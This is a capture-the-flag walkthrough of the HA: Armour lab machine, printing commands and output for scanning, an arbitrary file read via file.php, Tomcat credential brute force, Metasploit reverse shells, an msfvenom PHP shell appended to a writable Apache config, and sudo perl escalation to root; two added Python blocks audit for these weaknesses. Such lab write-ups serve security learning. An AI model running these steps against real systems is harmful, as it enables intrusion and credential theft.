HA: Armour Write-up



Download: click here

bilibili: click here

Information gathering

  • A host-discovery scan with nmap finds the target at 192.168.116.140.

➜ ~ nmap -sn 192.168.116.1/24
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:21 CST
Nmap scan report for 192.168.116.1
Host is up (0.00031s latency).
Nmap scan report for 192.168.116.140
Host is up (0.00074s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 5.09 seconds
➜ ~ nmap -A -T4 192.168.116.140 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:23 CST
Nmap scan report for 192.168.116.140
Host is up (0.0018s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA: Armour
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.24
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.24
65534/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 28:eb:55:eb:a6:63:c6:fd:23:36:31:27:de:cb:f8:0d (RSA)
| 256 a5:1b:86:a9:66:3e:b6:e6:af:d4:33:fe:2c:84:3b:62 (ECDSA)
|_ 256 c7:b2:0c:45:7f:9c:a2:98:fb:52:75:0d:0d:e1:1f:24 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.68 seconds
➜ ~
  • Ports 80, 8009 and 8080 are open, all web services: Apache httpd, Apache JServ (AJP) and Apache Tomcat respectively; port 65534 is SSH.

  • Connecting to SSH on that port shows the first flag in the banner, HulkBuster Armour:{7BDA7019C06B53AEFC8EE95D2CDACCAA}, and a hint: TheOlympics.

➜ ~ ssh 192.168.116.140 -p65534
The authenticity of host '[192.168.116.140]:65534 ([192.168.116.140]:65534)' can't be established.
ECDSA key fingerprint is SHA256:kYh7ax5tplAJb0W9IkeVePlscYpVFgSLsyepRlFi20A.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.116.140]:65534' (ECDSA) to the list of known hosts.


[ASCII-art banner: ARMOUR]


www.hackingarticles.in

HulkBuster Armour:{7BDA7019C06B53AEFC8EE95D2CDACCAA}

Hint 1: TheOlympics

kali-team@192.168.116.140's password:
  • Browsing port 80 and viewing the source (F12) shows a comment containing armour, notes.txt and 69. The 69 was puzzling at first, but anyone familiar with the TCP/UDP port list can guess it is TFTP (Trivial File Transfer Protocol); see the full TCP/UDP port list.
  • nmap with a UDP scan can check whether port 69 is open.
➜ ~ sudo nmap -sU -p69 192.168.116.140
[sudo] kali-team 的密码:
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:38 CST
Nmap scan report for 192.168.116.140
Host is up (0.00073s latency).

PORT STATE SERVICE
69/udp open|filtered tftp
MAC Address: 00:0C:29:E7:98:9F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.92 seconds
  • Sending UDP probes requires root, so prefix the command with sudo. The target has port 69 open (reported as open|filtered).
  • Connect with a TFTP client, download notes.txt and get the second flag.
➜ ~ atftp
tftp> connect 192.168.116.140
tftp> get notes.txt
tftp> quit
➜ ~ cat notes.txt
Spiderman Armour:{83A75F0B31435193BAFD3B9C5FD45AEC}

Hint 2: maybeevena
➜ ~
  • There is another hint, maybeevena, which means nothing yet. Next, brute-force .php files on port 80.
➜ ~ dirb http://192.168.116.140 -X .php

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Oct 9 22:23:10 2019
URL_BASE: http://192.168.116.140/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.116.140/ ----
+ http://192.168.116.140/file.php (CODE:200|SIZE:0)

-----------------
END_TIME: Wed Oct 9 22:23:13 2019
DOWNLOADED: 4612 - FOUND: 1
➜ ~
  • file.php is found; the page is blank, so fuzz the parameter name.
➜ ~ wfuzz -w Kali-Team_Tools/fuzzdb/attack/business-logic/CommonMethodNames.txt --hw 0 'http://192.168.116.140/file.php?FUZZ=/etc/passwd'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/bing.py Exception, msg=No module named 'shodan'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/shodanp.py Exception, msg=No module named 'shodan'
********************************************************
* Wfuzz 2.4 - The Web Fuzzer *
********************************************************

Target: http://192.168.116.140/file.php?FUZZ=/etc/passwd
Total requests: 77

===================================================================
ID Response Lines Word Chars Payload
===================================================================

000000033: 200 28 L 36 W 1437 Ch "file"

Total time: 0.130840
Processed Requests: 77
Filtered Requests: 76
Requests/sec.: 588.5036

➜ ~
  • The parameter is file, and it is an arbitrary file read. Since the server is Apache, the first files to try are Apache's own; a sensitive one is .htpasswd, usually at /etc/apache2/.htpasswd.
➜ ~ curl http://192.168.116.140/file.php\?file\=/etc/apache2/.htpasswd
Ant-Man Armour:{A9F56B7ECE2113C9C4A1214A19EDE99C}


Hint 3: StarBucks
➜ ~
  • That is the third flag and the third hint: StarBucks.
  • Official hint:

P.S. Klaw has a habit of dividing his passwords into 3 parts and save them at different locations. So, if you get some combine them to move forward.

  • Joining the three hints gives TheOlympics + maybeevena + StarBucks, i.e. TheOlympicsmaybeevenaStarBucks, which we simply try as the password.

Getting a Tomcat session

  • Opening port 8080 in the browser shows the Tomcat manager page. We already have the password; now we need the username.
➜ CeWL git:(master) ✗ ./cewl.rb -v http://192.168.116.140 -d 10 -w dict.txt
CeWL 5.4.6 (Exclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
Starting at http://192.168.116.140
Visiting: http://192.168.116.140, got response code 200
Attribute text found:


Offsite link, not following: https://hackingarticles.in
Writing words to file
➜ CeWL git:(master) ✗ cat dict.txt
Armour
PAGE
CONTENT
Header
ARMOUR
Collection
Armours
MCU
Photo
Grid
armour
End
Page
Content
Footer
Powered
Hacking
Articles
notes
txt
➜ CeWL git:(master) ✗ pwd
/home/kali-team/Kali-Team_Tools/CeWL
➜ CeWL git:(master) ✗
  • Use CeWL to crawl the port 80 site and build a username wordlist, then use MSF to enumerate Tomcat manager logins.
msf5 auxiliary(scanner/http/tomcat_mgr_login) > show options

Module options (auxiliary/scanner/http/tomcat_mgr_login):

Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD TheOlympicsmaybeevenaStarBucks no The HTTP password to specify for authentication
PASS_FILE /opt/metasploit/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.116.140 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TARGETURI /manager/html yes URI for Manager login. Default is /manager/html
THREADS 1 yes The number of concurrent threads
USERNAME no The HTTP username to specify for authentication
USERPASS_FILE /opt/metasploit/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /home/kali-team/Kali-Team_Tools/CeWL/dict.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host

msf5 auxiliary(scanner/http/tomcat_mgr_login) >
  • For some reason the enumeration only succeeded after I rebooted the target; the username is armour.
  • [+] 192.168.116.140:8080 - Login Successful: armour:TheOlympicsmaybeevenaStarBucks
  • There are many ways to get a shell onto Tomcat, such as deploying a WAR file by hand through the manager.
  • Using MSF here saves time.
msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword
set httppassword
msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword TheOlympicsmaybeevenaStarBucks
httppassword => TheOlympicsmaybeevenaStarBucks
msf5 exploit(multi/http/tomcat_mgr_upload) > set httpusername armour
httpusername => armour
msf5 exploit(multi/http/tomcat_mgr_upload) > run

[*] Started reverse TCP handler on 192.168.116.1:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying wJ0oIWvcGX...
[*] Executing wJ0oIWvcGX...
[*] Undeploying wJ0oIWvcGX ...
[*] Sending stage (53867 bytes) to 192.168.116.140
[*] Meterpreter session 1 opened (192.168.116.1:4444 -> 192.168.116.140:50706) at 2019-10-09 23:47:49 +0800

meterpreter >
  • Enumerate the ports listening locally on the target.
meterpreter > shell
Process 61 created.
Channel 75 created.
netstat -antp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:8081 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:65534 0.0.0.0:* LISTEN -
tcp6 0 0 :::8080 :::* LISTEN 572/java
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::65534 :::* LISTEN -
tcp6 0 0 127.0.0.1:8005 :::* LISTEN 572/java
tcp6 0 0 :::8009 :::* LISTEN 572/java
tcp6 0 0 192.168.116.140:50706 192.168.116.1:4444 ESTABLISHED 685/java
  • Port 8081 is listening on the target but bound to localhost only, so we forward it out; Meterpreter has this built in.
meterpreter > portfwd /?
Usage: portfwd [-h] [add | delete | list | flush] [args]


OPTIONS:

-L <opt> Forward: local host to listen on (optional). Reverse: local host to connect to.
-R Indicates a reverse port forward.
-h Help banner.
-i <opt> Index of the port forward entry to interact with (see the "list" command).
-l <opt> Forward: local port to listen on. Reverse: local port to connect to.
-p <opt> Forward: remote port to connect to. Reverse: remote port to listen on.
-r <opt> Forward: remote host to connect to.
meterpreter > portfwd add -l 8081 -p 8081 -r 127.0.0.1
[*] Local TCP relay created: :8081 <-> 127.0.0.1:8081
meterpreter >
  • Now requesting our own port 8081 returns the fourth flag.
➜ ~ curl http://127.0.0.1:8081
Black Panther Armour:{690B4BAC6CA9FB81814128A294470F92}
  • Or fetch it directly on the target.
tomcat@ubuntu:~$ cd /tmp
cd /tmp
tomcat@ubuntu:/tmp$ wget http://127.0.0.1:8081
wget http://127.0.0.1:8081
--2019-10-10 04:46:42-- http://127.0.0.1:8081/
Connecting to 127.0.0.1:8081... connected.
HTTP request sent, awaiting response... 200 OK
Length: 56 [text/html]
Saving to: ‘index.html’

index.html 100%[===================>] 56 --.-KB/s in 0s

2019-10-10 04:46:42 (2.79 MB/s) - ‘index.html’ saved [56/56]

tomcat@ubuntu:/tmp$ cat index.html
cat index.html
Black Panther Armour:{690B4BAC6CA9FB81814128A294470F92}
tomcat@ubuntu:/tmp$

Privilege escalation

  • Look for SGID files
tomcat@ubuntu:/$ find / -perm -g=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
/sbin/pam_extrausers_chkpwd
/sbin/unix_chkpwd
/usr/bin/crontab
/usr/bin/expiry
/usr/bin/chage
/usr/bin/ssh-agent
/usr/bin/wall
/usr/bin/bsd-write
/usr/bin/mlocate
tomcat@ubuntu:/$
  • Look for SUID files
tomcat@ubuntu:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/umount
/bin/su
/bin/ping
/bin/fusermount
/usr/bin/vmware-user-suid-wrapper
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
tomcat@ubuntu:/$
tomcat@ubuntu:/$ find / -perm -4000 2>dev/null | xargs ls -la
find / -perm -4000 2>dev/null | xargs ls -la
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 43088 Oct 15 2018 /bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28 04:05 /bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
-rwsr-xr-x 1 root root 26696 Oct 15 2018 /bin/umount
-rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Jan 17 2018 /usr/bin/sudo
-rwsr-xr-x 1 root root 18448 Jun 28 04:05 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 10312 May 14 00:07 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-- 1 root messagebus 42992 Jun 10 11:05 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
tomcat@ubuntu:/$
  • Look for writable directories; /var/www/html is among them.
tomcat@ubuntu:/$ find / -writable -type d 2>/dev/null
find / -writable -type d 2>/dev/null
/dev/mqueue
/dev/shm
/tftpboot
/var/lib/php/sessions
/var/www/html
/var/tmp
/proc/902/task/902/fd
/proc/902/fd
/proc/902/map_files
/tmp
  • Look for root-owned files that are writable.
tomcat@ubuntu:/$ find / -writable -type f 2>/dev/null | grep -v "/proc/" |xargs ls -al |grep root
-rwxrwxrwx 1 root root 7224 Sep 21 11:30 /etc/apache2/apache2.conf
-rwxrwxrwx 1 root tomcat 2262 Sep 21 21:15 /opt/tomcat/conf/tomcat-users.xml
--w--w--w- 1 root root 0 Oct 10 02:00 /sys/fs/cgroup/memory/cgroup.event_control
-rw-rw-rw- 1 root root 0 Oct 10 01:09 /sys/kernel/security/apparmor/.access
-rw-rw-rw- 1 root root 0 Oct 10 01:09 /sys/kernel/security/apparmor/.load
-rw-rw-rw- 1 root root 0 Oct 10 01:09 /sys/kernel/security/apparmor/.remove
-rw-rw-rw- 1 root root 0 Oct 10 01:09 /sys/kernel/security/apparmor/.replace
tomcat@ubuntu:/$
  • /etc/apache2/apache2.conf and /opt/tomcat/conf/tomcat-users.xml are writable.
  • tomcat-users.xml only holds the credentials we already have, so /etc/apache2/apache2.conf is the one worth looking at.

  • Check the passwd file. Each line has 7 colon-separated fields: username:password:UID:GID:comment:home directory:login shell.

  • The group file has 4 fields: group name:password:GID:member list.
tomcat@ubuntu:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
armour:x:1000:1000:armour,,,:/home/armour:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
tomcat:x:1001:1001::/opt/tomcat:/bin/false
aarti:x:1002:1002:,,,:/home/aarti:/bin/bash
tomcat@ubuntu:/$


tomcat@ubuntu:~$ cat /etc/group
cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:syslog,armour
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:armour
floppy:x:25:
tape:x:26:
sudo:x:27:armour
audio:x:29:
dip:x:30:armour
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:armour
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
systemd-journal:x:101:
systemd-network:x:102:
systemd-resolve:x:103:
input:x:104:
crontab:x:105:
syslog:x:106:
messagebus:x:107:
mlocate:x:108:
uuidd:x:109:
ssh:x:110:
armour:x:1000:
lpadmin:x:111:armour
sambashare:x:112:armour
ssl-cert:x:113:
tomcat:x:1001:
aarti:x:1002:
tomcat@ubuntu:~$
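As an added example (not part of the original write-up), the following Python parses the two formats just described and runs over constructed excerpts of the entries seen on this box, reporting which accounts have a real login shell and who can reach root through the sudo group, including members that appear only through their primary GID in passwd.

```python
from collections import namedtuple

PasswdEntry = namedtuple("PasswdEntry", "name passwd uid gid comment home shell")
GroupEntry = namedtuple("GroupEntry", "name passwd gid members")
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/bin/false", "/sbin/nologin"}

# Constructed excerpts mirroring the entries found on the box.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
armour:x:1000:1000:armour,,,:/home/armour:/bin/bash
tomcat:x:1001:1001::/opt/tomcat:/bin/false
aarti:x:1002:1002:,,,:/home/aarti:/bin/bash
"""
SAMPLE_GROUP = """\
root:x:0:
adm:x:4:syslog,armour
sudo:x:27:armour
armour:x:1000:
aarti:x:1002:
"""

def parse_passwd(text):
    """One entry per line, 7 colon-separated fields; malformed lines are skipped."""
    entries = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7 or not fields[0]:
            continue
        name, passwd, uid, gid, comment, home, shell = fields
        entries.append(PasswdEntry(name, passwd, int(uid), int(gid), comment, home, shell))
    return entries

def parse_group(text):
    """One entry per line, 4 fields; the last is a comma-separated member list."""
    entries = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 4 or not fields[0]:
            continue
        name, passwd, gid, members = fields
        entries.append(GroupEntry(name, passwd, int(gid), [m for m in members.split(",") if m]))
    return entries

def interactive_accounts(passwd_entries):
    """Accounts with a real login shell: the ones a password guess could land on."""
    return [e.name for e in passwd_entries if e.shell not in NOLOGIN_SHELLS]

def group_members(passwd_entries, group_entries, group_name):
    """Members of a group, listed explicitly or via their primary GID in passwd."""
    group = next((g for g in group_entries if g.name == group_name), None)
    if group is None:
        return []
    members = set(group.members)
    members.update(e.name for e in passwd_entries if e.gid == group.gid)
    return sorted(members)

def audit(passwd_text, group_text):
    """Summarise who can log in and who can reach root through the sudo group."""
    pw, gr = parse_passwd(passwd_text), parse_group(group_text)
    return {"interactive": interactive_accounts(pw), "sudo": group_members(pw, gr, "sudo")}

if __name__ == "__main__":
    print(audit(SAMPLE_PASSWD, SAMPLE_GROUP))
```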
  • Two regular users are found: aarti and armour.
  • Download the Apache config to our own machine; Apache runs as www-data by default.
http://192.168.116.140/file.php?file=/etc/apache2/apache2.conf
  • Change the User and Group directives so Apache runs as one of the regular users above. Why not root? Apache refuses to run as root unless it is recompiled for that, so the web service would simply not start. That leaves aarti.
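The weakness used here is an apache2.conf that anyone may write plus User/Group directives pointing at a regular user. As an added example, not from the write-up or from the Apache project, this Python audit checks a config for both: the sample config, the envvars values and the temporary file are constructed, and the ${APACHE_RUN_USER} expansion mirrors how Debian's apache2.conf picks up /etc/apache2/envvars.

```python
import os
import re
import stat
import tempfile

# Constructed fragment in the style of a Debian/Ubuntu apache2.conf.
SAMPLE_CONF = """\
ServerRoot "/etc/apache2"
Timeout 300
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
IncludeOptional conf-enabled/*.conf
"""
# Constructed /etc/apache2/envvars values; Debian expands User/Group from them.
WEAK_ENV = {"APACHE_RUN_USER": "aarti", "APACHE_RUN_GROUP": "aarti"}
SAFE_ENV = {"APACHE_RUN_USER": "www-data", "APACHE_RUN_GROUP": "www-data"}
EXPECTED_ACCOUNT = "www-data"
DIRECTIVE = re.compile(r"^[ \t]*(User|Group)[ \t]+(\S+)", re.MULTILINE)

def resolve(value, env):
    """Expand a ${VAR} reference the way apache2ctl does via envvars."""
    m = re.fullmatch(r"\$\{(\w+)\}", value)
    return env.get(m.group(1), value) if m else value

def audit_directives(text, env):
    """Flag User/Group directives that do not resolve to the service account."""
    findings = []
    for directive, raw in DIRECTIVE.findall(text):
        account = resolve(raw, env)
        if account != EXPECTED_ACCOUNT:
            findings.append(f"{directive} is {account!r}, expected {EXPECTED_ACCOUNT!r}")
    return findings

def audit_mode(path):
    """Flag a config that group or others may write (on the box it was mode 777)."""
    mode = os.stat(path).st_mode
    findings = []
    if mode & stat.S_IWGRP:
        findings.append(f"{path} is group-writable ({stat.filemode(mode)})")
    if mode & stat.S_IWOTH:
        findings.append(f"{path} is world-writable ({stat.filemode(mode)})")
    return findings

def audit(path, env):
    """Combine the permission check and the directive check for one config file."""
    with open(path) as fh:
        text = fh.read()
    return audit_mode(path) + audit_directives(text, env)

def demo():
    """Audit the constructed config first as found on the box, then after fixing it."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "apache2.conf")
        with open(path, "w") as fh:
            fh.write(SAMPLE_CONF)
        os.chmod(path, 0o777)
        weak = audit(path, WEAK_ENV)
        os.chmod(path, 0o644)
        return weak, audit(path, SAFE_ENV)

if __name__ == "__main__":
    for finding in demo()[0]:
        print(finding)
```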

  • Overwrite the Apache config file

tomcat@ubuntu:/etc/apache2$ wget http://192.168.116.1:8000/apache2.conf -O apache2.conf
--2019-10-10 04:52:49-- http://192.168.116.1:8000/apache2.conf
Connecting to 192.168.116.1:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7195 (7.0K) [text/plain]
Saving to: ‘apache2.conf’

apache2.conf 100%[===================>] 7.03K --.-KB/s in 0s

utime(apache2.conf): Operation not permitted
2019-10-10 04:52:49 (243 MB/s) - ‘apache2.conf’ saved [7195/7195]

tomcat@ubuntu:/etc/apache2$ cat apache2.conf
  • With the config in place, the intended route (the one the challenge author wrote up) is to drop a web shell into the web root served on port 80. That did not work for me: the file is created by the tomcat user, aarti cannot read it, so the page is unreachable and the server returns a 500.
  • Instead I got a session by including the Apache config file itself.
  • That is, append the shell to apache2.conf and then load it through the file inclusion vulnerability found earlier.
➜ ~ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.116.1 LPORT=2333 -o shell.php
➜ ~ cat shell.php >> apache2.conf

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.116.1:2333
[*] Sending stage (38288 bytes) to 192.168.116.140
[*] Meterpreter session 3 opened (192.168.116.1:2333 -> 192.168.116.140:48606) at 2019-10-10 13:22:53 +0800

meterpreter > getuid
Server username: aarti (1002)
meterpreter > shell
Process 12388 created.
Channel 0 created.
python3.6 -c 'import pty;pty.spawn("/bin/bash")'
aarti@ubuntu:/var/www/html$ whoami
whoami
aarti
aarti@ubuntu:/var/www/html$

Getting root

  • List the commands sudo allows without a password; perl is one of them.
aarti@ubuntu:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for aarti on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User aarti may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/perl
aarti@ubuntu:/var/www/html$
aarti@ubuntu:/var/www/html$ sudo perl -e 'exec "/bin/bash";'
sudo perl -e 'exec "/bin/bash";'
root@ubuntu:/var/www/html# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/var/www/html#
root@ubuntu:~# ls
ls
final.txt
root@ubuntu:~# cat final.txt
cat final.txt

[ASCII-art banner: ARMOUR]


IronMan Armour:{3AE9D8799D1BB5E201E5704293BB54EF}


!! Congrats you have finished this task !!

Contact us here:

Hacking Articles : https://twitter.com/rajchandel/

AArti Singh: https://www.linkedin.com/in/aarti-singh-353698114/

+-+-+-+-+-+ +-+-+-+-+-+-+-+
|E|n|j|o|y| |H|A|C|K|I|N|G|
+-+-+-+-+-+ +-+-+-+-+-+-+-+
root@ubuntu:~#